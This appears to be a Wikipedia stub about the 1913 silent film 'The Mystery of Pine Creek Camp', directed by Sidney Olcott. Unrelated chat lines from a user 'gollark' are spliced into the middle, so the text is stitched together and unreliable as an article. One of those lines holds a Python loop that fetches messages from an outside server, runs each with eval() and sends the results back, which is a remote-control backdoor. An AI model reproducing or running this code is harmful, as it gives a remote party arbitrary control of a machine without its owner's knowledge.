The Mystery of Pine Creek Camp
The Mystery of Pine Creek Camp is a 1913 American silent film produced by Gene Gauntier Feature Players and distributed by Warner's Features. It was directed by Sidney Olcott with himself, Gene Gauntier, Jack J. Clark and Arthur Donaldson in the leading roles.
The Mystery of Pine Creek Camp | |
---|---|
![]() | |
Directed by | Sidney Olcott |
Produced by | Gene Gauntier Feature Players |
Written by | Gene Gauntier |
Starring | Gene Gauntier Jack J. Clark Arthur Donaldson |
Distributed by | Warner's Features |
Release date |
|
Running time | 3000 ft |
Country | United States |
Language | Silent film (English intertitles) |
Production notes
- The film was shot in Jacksonville, Fla.
gollark: ```pythonimport urllib3, jsonhttp = urllib3.PoolManager()def send(x): http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "send", "channel": "potatOS", "message": x}), headers={"Content-Type": "application/json"})while True: r = http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "recv", "channel": "potatOS", "timeout": 30000}), headers={"Content-Type": "application/json"}) data = json.loads(r.data) if data["result"] != None: try: send(repr(eval(data["result"]["data"]))) except Exception as e: end(repr(e))```Here is a small version if you want that.
gollark: However, imagine disutilization of internet protocol version 6.
gollark: 0.0.0.0?
gollark: They proved themselves a formidable adversary last time.
gollark: Nope.
External links
- The Mystery of Pine Creek Camp on IMDb
- (in French) The Mystery of Pine Creek Camp website dedicated to Sidney Olcott
This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.